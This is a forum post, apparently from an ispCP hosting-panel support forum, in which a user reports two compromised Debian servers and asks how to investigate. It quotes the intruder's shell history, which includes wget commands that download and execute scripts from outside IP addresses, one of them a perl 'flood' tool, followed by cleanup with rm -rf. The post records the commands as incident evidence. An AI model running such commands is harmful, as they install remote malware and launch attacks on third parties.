Current time: 11-27-2024, 09:05 PM Hello There, Guest! (LoginRegister)


Post Reply 
2 Omega boxes hacked...
Author Message
robmorin Offline
Junior Member
*

Posts: 208
Joined: Apr 2007
Reputation: 0
Post: #1
2 Omega boxes hacked...
Hello all long time no post Smile

I had a friend call me to say he had 2 Debain servers acting funny , it turns out they were both hacked and both servers run ISPCP

Both server had weird running perl scripts and httpd binaries running as user vu2000

he is using version
ispCP 1.0.0 RC7 OMEGA
build: 20081212
Priamos

that user has no shell in passwd file, however the .bash_history file for that user on both boxes had this in it

/sbin/ifconfig|grep inet
cd /dev/shm
wget http://72.167.35.180/.x/ldaudit_pcprofile.sh ; sh ldaudit_pcprofile.sh
cd /dev/shm
ls
rm -rf *
ls -al
cd /tmp
ls -a
cd .ICE-unix
ls -a
wget http://208.75.230.43/bulanul/L;tar zxvf L;rm -rf L;cd .l;./a
cd ..
rm -rf .l
wget http://208.75.230.43/bulanul/flood;perl flood;rm -rf flood

There must be an exploit somewhere...

Now i left one box running hacked still as to maybe find more info to help out in case it is an exploit... so whats the next step?

Thanks...
05-06-2011 02:00 AM
Find all posts by this user Quote this message in a reply
Post Reply 


Messages In This Thread
2 Omega boxes hacked... - robmorin - 05-06-2011 02:00 AM
RE: 2 Omega boxes hacked... - fluser - 05-06-2011, 07:09 PM
RE: 2 Omega boxes hacked... - c0urier - 05-07-2011, 12:25 AM

Forum Jump:


User(s) browsing this thread: 2 Guest(s)